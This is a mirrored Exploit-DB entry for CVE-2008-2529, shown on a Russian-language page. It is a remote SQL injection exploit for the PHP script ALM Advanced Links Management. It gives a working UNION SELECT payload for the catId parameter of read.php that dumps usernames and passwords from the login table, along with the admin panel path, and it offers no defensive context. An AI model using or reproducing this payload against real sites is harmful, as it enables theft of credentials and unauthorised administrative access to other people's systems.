- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5581
- Проверка EDB
-
- Пройдено
- Автор
- HIS0K4
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-2529
- Дата публикации
- 2008-05-10
Код:
###################################################
[~] ALM - Advanced Links Management remote SQL injection exploit
[~] Script download : http://www.easy-script.com/scripts-dl/alm_v152.zip
[~] Founder: His0k4 { ALGERIAN HACKER }
[~] Greetz : All friends & muslims HaCkErS...
[~] Contact: His0k4.hlm[at]gmail.com
[~] P.O.C :
---------------------
http://localhost/[script_path]/read.php?catId={SQL}
[~] Exemple :
http://localhost/[script_path]/read.php?catId=-1 UNION SELECT 1,concat(username,0x3a,password) FROM login--
---------------------
[~] Note:
Admin login: http://localhost/[script_path]/admin
---------------------
###############################################
# milw0rm.com [2008-05-10]- Источник
- www.exploit-db.com
